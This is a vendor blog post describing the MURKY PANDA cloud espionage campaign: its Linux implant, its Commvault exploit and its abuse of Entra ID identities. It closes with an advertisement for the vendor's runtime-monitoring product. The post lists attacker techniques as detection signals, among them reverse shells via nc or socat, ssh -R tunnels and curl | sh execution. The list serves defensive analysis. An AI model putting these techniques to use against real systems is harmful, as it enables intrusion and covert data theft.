MURKY PANDA and the Blind Spot in Modern Cloud Security

August 21, 2025 – CrowdStrike disclosed ongoing activity by MURKY PANDA, a state-aligned Chinese espionage group purpose-built for the cloud. Unlike many threat actors who adapt legacy tactics, MURKY PANDA designs operations around cloud-native infrastructure from the ground up. Their latest campaign combines a Linux malware strain, a Commvault zero-day exploit, and identity abuse in Microsoft Entra ID to achieve long-term persistence, all while evading traditional detection.

Overview

State-backed groups have targeted cloud assets for years, but MURKY PANDA marks a turning point. Their operations aren’t simply on-premise tactics lifted into the cloud, they are engineered for the unique trust models and identity fabrics of SaaS, IaaS, and hybrid environments.

Targets include government agencies, research institutions, multinational tech firms, and increasingly, law firms and professional services providers that act as custodians of sensitive data. What makes them dangerous isn’t just malware. It’s their ability to weaponize the implicit trust built into cross-tenant permissions, service principals, and delegated access.

Technical Analysis: A Campaign That Blends In

CrowdStrike’s reporting highlights how MURKY PANDA gains access and maintains stealth through three primary mechanisms:

• Custom Linux Malware: CloudedHope
  A lightweight implant tailored for containerized cloud workloads. It avoids high-noise activities such as file system modification or privilege escalation. Instead, it hides in plain sight within process execution and network traffic, leveraging Python sockets and socat to maintain command-and-control (C2).
• Exploitation of CVE-2025-3928 (Commvault Zero-Day)
  Used for initial access, the flaw undermines backup infrastructure itself, compromising systems specifically designed to protect critical data.
• Identity Abuse in Microsoft Entra ID
  By manipulating Service Principals and exploiting GDAP/DAP cross-tenant relationships, MURKY PANDA achieves lateral movement across federated environments, pivoting seamlessly under the guise of legitimate credentials.

Each action is deliberate. Each blends into normal administrative behavior. And in log data, each appears indistinguishable from authorized activity.

Why Log-Based Security Fails in the Cloud

Most security teams depend on logs (API activity, audit trails, authentication events) to detect threats. But MURKY PANDA’s approach highlights why this model fails against cloud-native adversaries:

• Valid Credentials Look Legitimate
  Service Principal abuse produces “valid” actions in logs. Nothing triggers as anomalous.
• Low-Noise Persistence
  Reverse shells via ssh -R or socat leave little forensic residue.
• Invisible Process-Level Activity
  Inline execution of Python socket code or outbound TLS tunnels via openssl s_client are not captured in API logs.

From a log-only perspective, everything appears normal until exfiltration occurs, at which point it’s too late.

Runtime Visibility: Seeing What Logs Miss

Catching groups like MURKY PANDA requires runtime visibility and monitoring workloads at the process, network, and command-execution level. Activity-based baselining and deviation detection expose malicious actions that logs never surface.

Had runtime visibility been applied during this campaign, defenders would have seen clear compromise signals:

• Reverse shell creation with nc or socat
• SSH tunneling via ssh -R
• Inline Python socket execution for C2
• Outbound encrypted sessions launched via openssl s_client
• Remote code execution attempts with curl | sh

Each of these actions is a clear signal of compromise, but only if you’re watching the system in motion, not the logs in retrospect.

How Upwind Protects You From MURKY PANDA

MURKY PANDA’s campaign highlights a broader reality: cloud-native threats are no longer rare, they are the new baseline. With over 24,500 vulnerabilities disclosed in 2025 alone and attackers increasingly abusing cloud trust relationships instead of just CVEs, traditional log-based defenses leave organizations blind.

Upwind provides runtime visibility and protection to detect and stop campaigns like MURKY PANDA by enabling you to:

• Deliver Proactive Protection
  When Upwind detects activity consistent with advanced actors like MURKY PANDA, your team receives detailed, environment-specific guidance to mitigate risks before attackers can exfiltrate data.
• Expose Hidden Blind Spots
  Upwind automatically baselines your cloud workloads, identifying abnormal process execution and network tunneling that log-based tools miss.
• Detect Lateral Movement in Real Time
  Using eBPF-powered runtime monitoring, Upwind surfaces abuse of Service Principals, GDAP/DAP trust relationships, and tunneling behaviors (ssh -R, socat, inline Python sockets) the moment they occur.
• Correlate and Prioritize Threats
  Each detection is enriched with runtime context, tying together identity abuse, malware execution, and network anomalies so your team can rapidly assess intent and take action.

Schedule a call with us today to learn more about how Upwind detects lateral movement, reverse shells, and command-level attacks, in real time, across every layer of your cloud environment.